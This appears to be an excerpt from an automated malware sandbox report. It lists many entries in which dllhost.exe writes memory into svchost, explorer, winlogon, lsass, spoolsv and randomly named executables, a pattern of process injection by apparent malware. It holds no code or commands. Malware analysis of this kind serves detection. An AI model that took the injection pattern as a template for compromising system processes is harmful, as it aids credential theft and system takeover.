Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC87880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C39C960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E500000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5E060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
